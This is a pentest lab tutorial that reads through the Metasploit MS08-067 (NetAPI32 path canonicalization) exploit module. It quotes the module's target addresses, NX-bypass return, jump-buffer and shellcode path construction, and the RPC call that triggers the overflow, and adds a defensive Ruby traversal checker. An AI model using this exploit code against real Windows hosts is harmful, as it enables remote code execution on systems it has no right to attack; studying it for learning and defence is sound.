
Pentest Lab 0x02

Module ms08_067_netapi

This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. Use Google to find more public information or Metasploit-focused papers.

Reading the exploit module

On BackTrack 5, Metasploit is deployed in /opt/framework3/msf3. You can read the exploit module online or locally in /opt/framework3/msf3/modules/exploits/windows/smb/ms08_067_netapi.rb.

Main class

I don't know the right Ruby terms, but what is important is to gain experience by reading, even though you don't know the exact language syntax. If you are familiar with Python or PHP, it will be easier than you think.

Exploit integration starts with the Ruby class Metasploit3, which is derived from the parent class Msf::Exploit::Remote and includes (mixes in) code from the modules Msf::Exploit::Remote::DCERPC and Msf::Exploit::Remote::SMB.

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB

I found the definitions of these modules in /opt/framework3/msf3/lib/msf/core/exploit. After exploring the scripts dcerpc.rb and smb.rb, I can say they provide utility methods for interacting with DCERPC and SMB services. The class has a constructor which sets all the optional parameters we know from msfconsole (exploit description and parameters). An interesting detail is the Targets attribute, which is an array of:

'Targets' => [

  # Antoine's universal for Windows 2000
  [ 'Windows 2000 Universal',
    {
      'Ret'     => 0x001f1cb0,
      'Scratch' => 0x00020408,
    }
  ],

  # Metasploit's NX bypass for XP SP2/SP3
  [ 'Windows XP SP2 Czech (NX)',
    {
      'Ret'       => 0x6fe1f727,
      'DisableNX' => 0x6fe216e2,
      'Scratch'   => 0x00020408,
    }
  ],
],


Exploit method

The exploit method starts an SMB session with the remote victim.

def exploit

  # Use a copy of the target
  mytarget = target

  # Windows 2000, XP (NX), and 2003 (NO NX) mytargets
  if(not mytarget['RetDec'])

    jumper = Rex::Text.rand_text_alpha(70).upcase
    jumper[ 4,4] = [mytarget.ret].pack("V")
    jumper[50,8] = make_nops(8)
    jumper[58,2] = "\xeb\x62"

Jumper variable

Rex::Text is the Metasploit module for formatting text. The method Rex::Text.rand_text_alpha(70).upcase generates 70 bytes of random alphabetic characters and converts them to uppercase, so the jumper variable is a random character array 70 bytes long. After that, some substitutions follow at specific positions in the jumper array.

Starting at the 4th byte we inject the 4-byte return address. Array#pack("V") packs the integer as a 32-bit unsigned little-endian value, which is what we need when we want to write addresses into a buffer. From the 50th byte we put 8 NOP instructions. It is hard to say at a glance what the final two bytes "\xeb\x62" do (on x86, 0xEB is the opcode of a short relative jump), but OK, let's go ahead.

Path string construction

Now, reading the composition of the Path string will be easier given the methods we already know. We construct the path string from Unicode strings: a random 100-byte alpha array, then our chosen payload (encoded), then more Unicode traversal backslashes, and extra padding (pad = 'A').

path =
  Rex::Text.to_unicode("\\") +

  # This buffer is removed from the front
  Rex::Text.rand_text_alpha(100) +

  # Shellcode
  payload.encoded +

  # Relative path to trigger the bug
  Rex::Text.to_unicode("\\..\\..\\") +

  # Extra padding
  Rex::Text.to_unicode(pad) +

  # Writable memory location (static)
  [mytarget['Scratch']].pack("V") + # EBP

  # Return to code which disables NX (or just the return)
  [ mytarget['DisableNX'] || mytarget.ret ].pack("V") +

  # Padding with embedded jump
  jumper +

  # NULL termination
  "\x00" * 2

And now we add memory addresses to the path string. One is "Scratch" (a writable memory location, used as the saved EBP), the other is the address of code which disables NX protection and then continues into our jumper code (or just the plain return address for targets without DisableNX). Finally we terminate the string with two zero bytes, which ends the string when it is interpreted by C string functions.
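As an added example (my own Ruby, not code from the Metasploit module), the block below shows what Array#pack("V") does to the addresses in the Targets table, and a small depth-tracking canonicalizer that refuses the "\..\..\" traversal above the root, which is the condition a correct NetprPathCanonicalize must reject rather than walk backwards in its buffer. All sample paths are constructed here.

```ruby
# Added example (not from the Metasploit module): what Array#pack("V") does
# to the addresses from the Targets table, and a depth-tracking canonicalizer
# that refuses a "\..\..\" traversal above the share root, the case the
# NetprPathCanonicalize parser mishandled. Sample inputs are constructed here.

# pack("V") = 32-bit unsigned integer, little-endian (lowest byte first)
def pack_addr(addr)
  [addr].pack("V")
end

# The reverse operation, handy when reading such a buffer back
def unpack_addr(bytes)
  bytes.unpack1("V")
end

# Walks the path component by component: ".." pops one level, any other
# component pushes one. Returns nil when ".." would climb above the root,
# which a safe canonicalizer must reject instead of walking backwards
# in its buffer.
def canonicalize(path)
  stack = []
  path.split(/[\\\/]+/).each do |part|
    next if part.empty? || part == "."
    if part == ".."
      return nil if stack.empty?
      stack.pop
    else
      stack.push(part)
    end
  end
  "\\" + stack.join("\\")
end

# Detection helper: takes the path as it appears on the wire (UTF-16LE,
# possibly mixed with non-text bytes) and reports whether it escapes the root.
def traversal_escapes_root?(wire_bytes)
  utf16 = wire_bytes.dup.force_encoding("UTF-16LE")
  path = utf16.encode("UTF-8", invalid: :replace, undef: :replace)
  canonicalize(path).nil?
end

if __FILE__ == $0
  puts pack_addr(0x001f1cb0).unpack1("H*")                 # b01c1f00
  puts canonicalize("\\share\\dir\\..\\file")                # \share\file
  sample = ("\\" + "A" * 100 + "\\..\\..\\").encode("UTF-16LE")  # constructed
  puts traversal_escapes_root?(sample)                     # true
end
```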

Send the Path string in an RPC call

handle = dcerpc_handle(
  '4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
  'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
)

stub =
  NDR.uwstring(server) +
  NDR.UnicodeConformantVaryingStringPreBuilt(path) +
  NDR.long(rand(1024)) +
  NDR.wstring(prefix) +
  NDR.long(4097)          # the remaining stub fields are cut off on this page

# NOTE: we don't bother waiting for a response here...
print_status("Attempting to trigger the vulnerability...")
dcerpc.call(opnum, stub, false)   # opnum: the Server Service operation number (placeholder, cut off on this page)

# Cleanup
